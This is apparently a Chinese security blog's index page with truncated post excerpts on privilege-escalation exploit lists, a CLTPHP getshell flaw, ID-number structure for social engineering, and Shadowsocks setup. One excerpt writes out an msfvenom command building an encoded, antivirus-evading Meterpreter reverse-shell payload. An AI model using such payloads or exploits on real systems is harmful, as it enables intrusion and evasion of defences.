News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

The Lastest

网络技术

windows 下搭建shadowsocks 服务端

jasonx 3123 0

Linux下搭建服务端已经非常常见了,今天尝试在windows 下搭建shadowsocks 服务现将记录如下一、下载 libQtShadowsocksWindows服务端软件下载地址https://github.com/shadowsocks/libQtShadowsocks/releases根据自己电脑系统版本下载对应的版本,下载后进行解压得到文件 shadowsocks-libqss.exe二、配置相关文件在程序目录下创建...

社会工程学

关于身份证号码的那些秘密

jasonx 1573 0

身份证号码字典生成工具查考这里 https://www.jasonx.cc/archives/491.html1.号码的结构   公民身份号码是特征组合码,由十七位数字本体码和一位校验码组成。排列顺序从左至右依次为:六位数字地址码,八位数字出生日期码,三位数字顺序码和一位数字校验码。2.地址码   表示编码对象常住户口所在县(市、旗、区)的行政区划代码,按GB/T2260的规定执行。3.出生日期码   表示编码对象出生的年、月、日...

漏洞研究

护卫神提权漏洞利用分析

jasonx 1733 0

0×01 前言护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫神14年安全防护经验,严格限制每个站点独立权限,彻底阻挡跨站入侵。但这套系统真的像描述的那么安全么?,由于某次安全测试...

漏洞研究

Window提权Exp合集

jasonx 2979 0

漏洞列表#Security Bulletin #KB #Description #Operating SystemCVE-2017-0213  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)MS17-010  [KB4013389]  [Windows Kernel Mode Drivers]  (windo...

漏洞研究

Linux提权Exp合集

jasonx 2676 0

CVE  #Description  #KernelsCVE-2017-1000367  [Sudo](Sudo 1.8.6p7 - 1.8.20)CVE-2017-7494  [Samba Remote execution](Samba 3.5.0-4.6.4/4.5.10/4.4.14)CVE-2016-5195  [Dirty cow](Linux kernel>2.6.22 (released in 2007))CV...

渗透测试

Metasploit生成免杀payload

jasonx 1354 0

先用kali生成一个payload> msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.2.222 -e x86/shikata_ga_nai -i 11 -f py -o C:/luan/luan.py 然后打开luan.py,替换shellcode部分:from ctypes import * import ctypes shell...

漏洞研究

CLTPHP前台无限制Getshell

jasonx 4759 0

0x01 环境准备CLTPHP官网:http://www.cltphp.com网站源码版本:CLTPHP内容管理系统5.5.3版本(2018-01-30 更新)程序源码下载:https://gitee.com/chichu/cltphp默认后台地址: http://127.0.0.1/admin/login/index.html默认账号密码: 后台登录名:admin 密码:admin1230x02 漏洞利用本地测试1、 因为无需任...